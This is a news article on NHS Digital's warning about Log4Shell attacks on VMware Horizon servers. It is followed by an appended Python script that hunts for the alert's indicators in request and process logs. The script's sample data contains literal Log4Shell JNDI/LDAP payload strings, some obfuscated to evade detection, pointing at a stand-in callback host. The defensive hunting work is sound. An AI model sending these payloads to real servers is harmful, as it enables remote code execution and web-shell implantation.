

Threat hunters in the U.K.’s National Health Service have raised an alarm over an unknown threat actor hitting vulnerable VMware Horizon servers with exploits for the ubiquitous Log4j security flaw known as Log4Shell.

According to an advisory from NHS Digital, attackers are exploiting the critical vulnerability in the Apache Tomcat service embedded within VMware Horizon.

The warning comes almost exactly one month after the first disclosure of the Log4j remote code execution vulnerability, which threatens widespread damage across the internet and heightens the urgency for enterprise defenders to find and fix the issue.

The NHS Digital team believes the attacks are being used to establish persistence within affected networks, and noted that the attack likely consists of a reconnaissance phase in which the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure.

“Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service,” according to the alert.

“The web shell can then be used by an attacker to carry out a number of malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware,” it added.

VMware has already shipped high-priority patches for numerous products affected by Log4j and previously acknowledged scanning attempts to identify signs of vulnerable installations.

On the targeted VMware Horizon platform, which is used by enterprises to run virtual desktops and apps across the hybrid cloud, the Log4j vulnerability carries a 10-out-of-10 critical rating.

The NHS Digital team also cautioned that additional VMware systems may be vulnerable and that affected organisations should regularly review the VMSA-2021-0028 security advisory.

Using artifacts from the VMware Horizon attacks, security experts are urging organizations to look for evidence of ws_TomcatService.exe spawning abnormal processes, or any powershell.exe processes containing ‘VMBlastSG’ in the command line.

Microsoft and others have previously warned that APT actors linked to China, Iran, North Korea and Turkey have already pounced and are actively exploiting the Log4j security defect.
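As an added example (not part of the NHS Digital alert or of this article), the Python below turns the indicators described here into a hunt that can be run offline: it checks request logs for the JNDI lookup strings used in the reconnaissance phase, and checks process-creation records for ws_TomcatService.exe spawning children outside a baseline and for powershell.exe command lines mentioning VMBlastSG. It goes slightly beyond the article by also collapsing the nested `${lower:…}`/`${::-…}` lookup obfuscation that Log4Shell payloads commonly use to hide the literal `jndi` token. All log lines, file paths, IP addresses, command lines and the `expected_children` baseline are constructed for illustration; in practice the process-event logic would be run in PowerShell or a SIEM against the Horizon servers' own telemetry.

```python
"""Hunt for the Horizon/Log4Shell indicators described in the NHS Digital alert.

All sample data in this file is constructed for illustration; the paths, IPs
and command lines are not taken from any real incident.
"""
import re
from dataclasses import dataclass

# ---- 1. Reconnaissance phase: JNDI lookup strings in request logs ----------

# Log4j lookups that attackers nest around the literal "jndi" to dodge naive greps:
#   ${lower:J}      -> j
#   ${::-j}         -> j   (empty key, default value "j")
#   ${env:NOPE:-j}  -> j   (unknown key, default value "j")
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Resolve innermost lower/upper/default lookups until nothing changes."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(log_lines):
    """Return (raw_line, normalized_line) for each line carrying a JNDI lookup."""
    hits = []
    for line in log_lines:
        norm = normalize_lookups(line)
        if _JNDI.search(norm):
            hits.append((line, norm))
    return hits


# ---- 2. Post-exploitation: process-creation indicators from the alert ------

@dataclass(frozen=True)
class ProcessEvent:
    """Minimal Sysmon Event ID 1 / EDR process-creation record."""
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def hunt_process_events(events, expected_children=frozenset()):
    """Flag ws_TomcatService.exe children outside a baseline, and any
    powershell.exe whose command line mentions VMBlastSG.

    expected_children is an analyst-supplied baseline (hypothetical here); the
    empty default treats every Tomcat child as abnormal, as the alert implies.
    """
    expected = {c.lower() for c in expected_children}
    findings = []
    for ev in events:
        parent, child = _basename(ev.parent_image), _basename(ev.image)
        if parent == "ws_tomcatservice.exe" and child not in expected:
            findings.append(("tomcat-abnormal-child", ev))
        if child == "powershell.exe" and "vmblastsg" in ev.command_line.lower():
            findings.append(("vmblastsg-powershell", ev))
    return findings


# ---- Constructed sample input (documentation IP range, illustrative paths) --

SAMPLE_REQUEST_LOG = [
    '10.0.0.5 - - "GET /portal/ HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET /portal/ HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/o}"',
    '10.0.0.9 - - "GET /portal/ HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/o}"',
    '10.0.0.9 - - "GET /portal/ HTTP/1.1" 200 "-" "${${::-j}${::-n}di:ldap://198.51.100.7:1389/o}"',
]

_TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROCESS_EVENTS = [
    ProcessEvent(_TOMCAT, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),
    ProcessEvent(r"C:\Windows\explorer.exe", _PS,
                 'powershell.exe -nop -c "Stop-Service VMBlastSG; Start-Service VMBlastSG"'),
    ProcessEvent(r"C:\Windows\System32\services.exe", _TOMCAT, "ws_TomcatService.exe"),
    ProcessEvent(r"C:\Windows\explorer.exe", _PS, "powershell.exe Get-Process"),
    ProcessEvent(_TOMCAT, r"C:\Windows\System32\conhost.exe", "conhost.exe 0x4"),
]


if __name__ == "__main__":
    for raw, norm in find_jndi_lookups(SAMPLE_REQUEST_LOG):
        print("JNDI lookup:", norm)
    # Suppose the analyst has baselined conhost.exe as a normal child (hypothetical).
    for kind, ev in hunt_process_events(SAMPLE_PROCESS_EVENTS, {"conhost.exe"}):
        print(kind, "->", ev.command_line)
```

The de-obfuscation loop is bounded so a hostile log line cannot spin it indefinitely, and matching is done on the normalized text only, so the raw line is preserved for the analyst's triage. The VMBlastSG indicator is applied exactly as the article states it, which means legitimate administration of the Blast Secure Gateway service will also match and should be tuned against known change windows.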
